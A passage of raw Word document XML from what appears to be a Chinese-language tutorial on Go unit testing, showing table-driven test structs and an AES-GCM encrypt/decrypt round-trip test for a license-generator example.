    </w:p>
    <w:p w14:paraId="5E74EC59" w14:textId="413CBD87" w:rsidR="00EE3FC3" w:rsidRDefault="009C36E7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6689881D" w14:textId="45379B80" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42CBF3F0" w14:textId="77777777" w:rsidR="009C36E7" w:rsidRDefault="009C36E7" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </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t xml:space="preserve">plaintext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>tests := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </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t xml:space="preserve">name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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t>{</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> wowo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">args: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</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t xml:space="preserve">plaintext: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"asd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72027C02" w14:textId="77777777" w:rsidR="009C36E7" w:rsidRPr="009C36E7" w:rsidRDefault="009C36E7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463C8F3D" w14:textId="4FC6FBDF" w:rsidR="009C36E7" w:rsidRDefault="006B0724" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功或失败逻辑部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3058B" w14:textId="77777777" w:rsidR="006B0724" w:rsidRDefault="006B0724" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779B1723" w14:textId="5F187F79" w:rsidR="006B0724" w:rsidRPr="004C5DA1" w:rsidRDefault="006B0724" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C5DA1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一般只写失败，成功不用写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEC993" w14:textId="6F04A89F" w:rsidR="006B0724" w:rsidRPr="004C5DA1" w:rsidRDefault="004C5DA1" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tt := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">range </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tests {</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t>t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(t *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>testing</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6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">cipher := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EncryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(tt.args.plaintext)</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">plaintext := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DecryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(cipher)</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tt.args.plaintext != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(plaintext) {</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>t.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Fail</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A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</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t>})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155449C" w14:textId="77777777" w:rsidR="00EE3FC3" w:rsidRDefault="00EE3FC3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F00EC82" w14:textId="1E4ED451" w:rsidR="00EF1AB8" w:rsidRDefault="00EF1AB8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成器密码模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C565F30" w14:textId="77777777" w:rsidR="00EF1AB8" w:rsidRDefault="00EF1AB8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5125E5" w14:textId="24E500E0" w:rsidR="00EF1AB8" w:rsidRPr="001C5135" w:rsidRDefault="001C5135" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>gcmAesCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"reflect"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
